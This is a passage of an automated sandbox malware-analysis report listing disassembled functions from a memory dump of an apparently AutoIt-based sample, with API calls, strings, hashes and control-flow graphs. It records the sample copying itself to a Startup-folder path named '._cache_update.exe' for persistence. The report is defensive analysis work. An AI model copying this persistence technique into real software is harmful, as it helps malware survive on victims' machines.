                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c84931c3016732b888b1d3661fdd089e4708fdc18309d2dd2620ddca9096d4da
                                                                                                                                                                  • Instruction ID: 3a145415c336cb802845a087466524499e1b8e7dc067f51bab5eb45120d49e88
                                                                                                                                                                  • Opcode Fuzzy Hash: c84931c3016732b888b1d3661fdd089e4708fdc18309d2dd2620ddca9096d4da
                                                                                                                                                                  • Instruction Fuzzy Hash: D0228B70A00646DFDB28DF59D490ABEF7F0FF18300F148069E85AAB391E771A995CB91
                                                                                                                                                                  Function 001F3680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3964851224-0
                                                                                                                                                                  • Opcode ID: 58eddaeecaca295973f2a9f25c32d43499cb0b09add67f6bf29bf7d6decaeaac
                                                                                                                                                                  • Instruction ID: cf2e7c9352d20ddd1cc245c31590347e35b7dd4c718aba727c2be6403e2d85a4
                                                                                                                                                                  • Opcode Fuzzy Hash: 58eddaeecaca295973f2a9f25c32d43499cb0b09add67f6bf29bf7d6decaeaac
                                                                                                                                                                  • Instruction Fuzzy Hash: 91928970608345DFD724DF18C491B6ABBE0BF88304F14895DFA9A8B2A2D771ED49CB52
                                                                                                                                                                  Function 0025C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: NameUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                                  • Opcode ID: 72622767f81f1ac00b5488a63d5d1da891fa5e842004c9668f6742c052c21f2d
                                                                                                                                                                  • Instruction ID: 04d8423387bffed714b1189f6a68d5abc0f67df4386dbcbd16c5fadd764aea7d
                                                                                                                                                                  • Opcode Fuzzy Hash: 72622767f81f1ac00b5488a63d5d1da891fa5e842004c9668f6742c052c21f2d
                                                                                                                                                                  • Instruction Fuzzy Hash: 93C04CB181400DDFC715CBC0DD49AEFB7BCBB04301F104095E115E1000D7B09B459B75
                                                                                                                                                                  Function 001EE1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EE279
                                                                                                                                                                  • timeGetTime.WINMM ref: 001EE51A
                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 001EE646
                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 001EE651
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EE664
                                                                                                                                                                  • LockWindowUpdate.USER32(00000000), ref: 001EE697
                                                                                                                                                                  • DestroyWindow.USER32 ref: 001EE6A3
                                                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001EE6BD
                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00255B15
                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 002562AF
                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 002562BD
                                                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002562D1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                                  • API String ID: 2641332412-570651680
                                                                                                                                                                  • Opcode ID: 871afc2a51a55337d0af1aa9072b41822786993a4d5ab3bd575af5b8c8cf774b
                                                                                                                                                                  • Instruction ID: bd0622e4c34d6d79503791667f4fc959eff8ad093f0c1e1083143011f3cb096a
                                                                                                                                                                  • Opcode Fuzzy Hash: 871afc2a51a55337d0af1aa9072b41822786993a4d5ab3bd575af5b8c8cf774b
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A621370508785DFEB24DF24D899BAE77E4BF45304F04486DF94A8B2A2DBB1D848CB52
                                                                                                                                                                  Function 00216A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___createFile.LIBCMT ref: 00216C73
                                                                                                                                                                  • ___createFile.LIBCMT ref: 00216CB4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00216CDD
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00216CE4
                                                                                                                                                                  • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00216CF7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00216D1A
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00216D23
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00216D2C
                                                                                                                                                                  • __set_osfhnd.LIBCMT ref: 00216D5C
                                                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00216DC6
                                                                                                                                                                  • __close_nolock.LIBCMT ref: 00216DEC
                                                                                                                                                                  • __chsize_nolock.LIBCMT ref: 00216E1C
                                                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00216E2E
                                                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00216F26
                                                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00216F3B
                                                                                                                                                                  • __close_nolock.LIBCMT ref: 00216F9B
                                                                                                                                                                    • Part of subcall function 0020F84C: CloseHandle.KERNEL32(00000000,0028EEC4,00000000,?,00216DF1,0028EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0020F89C
                                                                                                                                                                    • Part of subcall function 0020F84C: GetLastError.KERNEL32(?,00216DF1,0028EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0020F8A6
                                                                                                                                                                    • Part of subcall function 0020F84C: __free_osfhnd.LIBCMT ref: 0020F8B3
                                                                                                                                                                    • Part of subcall function 0020F84C: __dosmaperr.LIBCMT ref: 0020F8D5
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00216FBD
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002170F2
                                                                                                                                                                  • ___createFile.LIBCMT ref: 00217111
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0021711E
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00217125
                                                                                                                                                                  • __free_osfhnd.LIBCMT ref: 00217145
                                                                                                                                                                  • __invoke_watson.LIBCMT ref: 00217173
                                                                                                                                                                  • __wsopen_helper.LIBCMT ref: 0021718D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                                  • String ID: 9A $@
                                                                                                                                                                  • API String ID: 3896587723-4139971684
                                                                                                                                                                  • Opcode ID: 9d9548e415c8ee75e797d017b46a2b275429d3d3a1cc2751421babb5cc6c07ee
                                                                                                                                                                  • Instruction ID: 266edfc127d862ed63f0873a5df234ff9bc992ba5703fcbbac0dd0ec4be70186
                                                                                                                                                                  • Opcode Fuzzy Hash: 9d9548e415c8ee75e797d017b46a2b275429d3d3a1cc2751421babb5cc6c07ee
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C2248719242069BEB248F68DC59BEE7BB1EF24324F244229E551A72D2C7758DF0CB90
                                                                                                                                                                  Function 002276DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 002276ED
                                                                                                                                                                  • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00227713
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 00227741
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022774C
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00227762
                                                                                                                                                                  • _wcsstr.LIBCMT ref: 0022776D
                                                                                                                                                                  • 74D41560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00227789
                                                                                                                                                                  • _wcscat.LIBCMT ref: 002277D2
                                                                                                                                                                  • _wcscat.LIBCMT ref: 002277D9
                                                                                                                                                                  • _wcsncpy.LIBCMT ref: 00227804
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscat$FileInfoVersion$D41560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                  • API String ID: 716990576-1459072770
                                                                                                                                                                  • Opcode ID: 44290c6e33c5fdf34c24dd7e6ba9781aef6e702f5e92a08f0fdc8d4225915166
                                                                                                                                                                  • Instruction ID: e6e865cf1176600f259357a8873bea7eec0574eca9df73b4eacdd8db28afaf85
                                                                                                                                                                  • Opcode Fuzzy Hash: 44290c6e33c5fdf34c24dd7e6ba9781aef6e702f5e92a08f0fdc8d4225915166
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D410B71924314BAE701A7A49C8BEBFB7BCDF55710F00405AF404A61D3EBB49A31DAA1
                                                                                                                                                                  Function 001E1F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 608 1e1f04-1e1f9c call 1e2d1a * 2 call 1ec935 * 2 call 1e7e53 call 1ed3d2 * 3 625 252569-252575 call 202626 608->625 626 1e1fa2-1e1fa6 608->626 629 25257d-252583 call 21e4ea 625->629 628 1e1fac-1e1faf 626->628 626->629 632 25258f-25259b call 1ea4f6 628->632 633 1e1fb5-1e1fb8 628->633 629->632 640 2525a1-2525b1 call 1ea4f6 632->640 641 252899-25289d 632->641 633->632 634 1e1fbe-1e1fc7 GetForegroundWindow call 1e200a 633->634 639 1e1fcc-1e1fe3 call 1e197e 634->639 651 1e1fe4-1e2007 call 1e5cd3 * 3 639->651 640->641 654 2525b7-2525c5 640->654 643 25289f-2528a6 call 1ec935 641->643 644 2528ab-2528ae 641->644 643->644 648 2528b7-2528c4 644->648 649 2528b0 644->649 652 2528d6-2528da 648->652 653 2528c6-2528d4 call 1eb8a7 CharUpperBuffW 648->653 649->648 658 2528f1-2528fa 652->658 659 2528dc-2528df 652->659 653->652 657 2525c9-2525e1 call 21d68d 654->657 657->641 673 2525e7-2525f7 call 1ff885 657->673 660 2528fc-252909 GetDesktopWindow EnumChildWindows 658->660 661 25290b EnumWindows 658->661 659->658 665 2528e1-2528ef call 1eb8a7 CharUpperBuffW 659->665 667 252911-252930 call 21e44e call 1e2d1a 660->667 661->667 665->658 685 252940 667->685 686 252932-25293b call 1e200a 667->686 680 2525fd-25260d call 1ff885 673->680 681 25287b-25288b call 1ff885 673->681 692 252861-252871 call 1ff885 680->692 693 252613-252623 call 1ff885 680->693 690 252873-252876 681->690 691 25288d-252891 681->691 686->685 691->651 694 252897 691->694 692->690 702 252842-252848 GetForegroundWindow 692->702 700 25281d-252836 call 2288a2 IsWindow 693->700 701 252629-252639 call 1ff885 693->701 697 252852-252858 694->697 697->692 700->651 709 25283c-252840 700->709 711 252659-252669 call 1ff885 701->711 712 25263b-252640 701->712 704 252849-252850 call 1e200a 702->704 704->697 709->704 719 25266b-252675 711->719 720 25267a-25268a call 1ff885 711->720 713 252646-252657 call 1e5cf6 712->713 714 25280d-25280f 712->714 724 25269b-2526a7 call 1e5be9 713->724 718 252817-252818 714->718 718->651 722 2527e6-2527f0 call 1ec935 719->722 728 2526b5-2526c5 call 1ff885 720->728 729 25268c-252698 call 1e5cf6 720->729 733 252804-252808 722->733 734 252811-252813 724->734 735 2526ad-2526b0 724->735 739 2526c7-2526de call 202241 728->739 740 2526e3-2526f3 call 1ff885 728->740 729->724 733->657 734->718 735->733 739->733 745 2526f5-25270c call 202241 740->745 746 252711-252721 call 1ff885 740->746 745->733 751 252723-25273a call 202241 746->751 752 25273f-25274f call 1ff885 746->752 751->733 757 252751-252768 call 202241 752->757 758 25276d-25277d call 1ff885 752->758 757->733 763 252795-2527a5 call 1ff885 758->763 764 25277f-252793 call 202241 758->764 769 2527a7-2527b7 call 1ff885 763->769 770 2527c3-2527d3 call 1ff885 763->770 764->733 769->690 775 2527bd-2527c1 769->775 776 2527d5-2527da 770->776 777 2527f2-252802 call 21d614 770->777 775->733 778 252815 776->778 779 2527dc-2527e2 776->779 777->690 777->733 778->718 779->722
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 001E1FBE
                                                                                                                                                                  • IsWindow.USER32(?), ref: 0025282E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Foreground_memmove
                                                                                                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                  • API String ID: 3828923867-1919597938
                                                                                                                                                                  • Opcode ID: c7ed377c35c5fd9fde6f734e92838e9e97787994ff75efa0ad87ca546360899a
                                                                                                                                                                  • Instruction ID: af6ef6e0ebf6c0f46ea2cca4160ca690d0e3037ea5262bf62bb3bc75ffb252ef
                                                                                                                                                                  • Opcode Fuzzy Hash: c7ed377c35c5fd9fde6f734e92838e9e97787994ff75efa0ad87ca546360899a
                                                                                                                                                                  • Instruction Fuzzy Hash: 03D13930114643EBCB08EF51C894AADB7A5BF25344F144A2DF855571E2CB70E9BECBA2
                                                                                                                                                                  Function 001FE975 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 170COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 001FEA39
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 001FEA56
                                                                                                                                                                    • Part of subcall function 0020297D: __wsplitpath_helper.LIBCMT ref: 002029BD
                                                                                                                                                                  • _wcsncat.LIBCMT ref: 001FEA69
                                                                                                                                                                  • __makepath.LIBCMT ref: 001FEA85
                                                                                                                                                                    • Part of subcall function 00202BFF: __wmakepath_s.LIBCMT ref: 00202C13
                                                                                                                                                                    • Part of subcall function 0020010A: std::exception::exception.LIBCMT ref: 0020013E
                                                                                                                                                                    • Part of subcall function 0020010A: __CxxThrowException@8.LIBCMT ref: 00200153
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 001FEABE
                                                                                                                                                                    • Part of subcall function 001FEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,001FEADA,?,?), ref: 001FEB27
                                                                                                                                                                  • _wcscat.LIBCMT ref: 002532FC
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00253334
                                                                                                                                                                  • _wcsncpy.LIBCMT ref: 00253370
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                                                  • String ID: '/"$Include$\$"*
                                                                                                                                                                  • API String ID: 1213536620-1532446309
                                                                                                                                                                  • Opcode ID: 2d0b2f160460cfb2c8ae6b89adb7412837d4a457e084768d0ac5e923490f3c4b
                                                                                                                                                                  • Instruction ID: 58371af6bd90aa29ea397f02302a8b64a6ad7cc8d6142ffb082418ff52952532
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d0b2f160460cfb2c8ae6b89adb7412837d4a457e084768d0ac5e923490f3c4b
                                                                                                                                                                  • Instruction Fuzzy Hash: 28518DB1414340EBCB04EF59FC89C9AB7E8FB5A300B40495EF945832A1EB74965CCF66
                                                                                                                                                                  Function 001E4257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00000000,00000001,00000000), ref: 001E428C
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                    • Part of subcall function 00201BC7: __wcsicmp_l.LIBCMT ref: 00201C50
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 001E43C0
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0025214E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe$CMDLINE$CMDLINERAW
                                                                                                                                                                  • API String ID: 861526374-1727565619
                                                                                                                                                                  • Opcode ID: 3c902a9e3cbb69a06b897d5db074abc5b5acff74c80a6377620641048aa93191
                                                                                                                                                                  • Instruction ID: df75208a7a92071167f6f3092f90e0973620e9dab17482a2199bac3d190ef213
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c902a9e3cbb69a06b897d5db074abc5b5acff74c80a6377620641048aa93191
                                                                                                                                                                  • Instruction Fuzzy Hash: 48819C72900659ABCB04EBE1DC56EEFB7B8AF25360F200015F505B7082EF706B19CBA1
                                                                                                                                                                  Function 002278EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
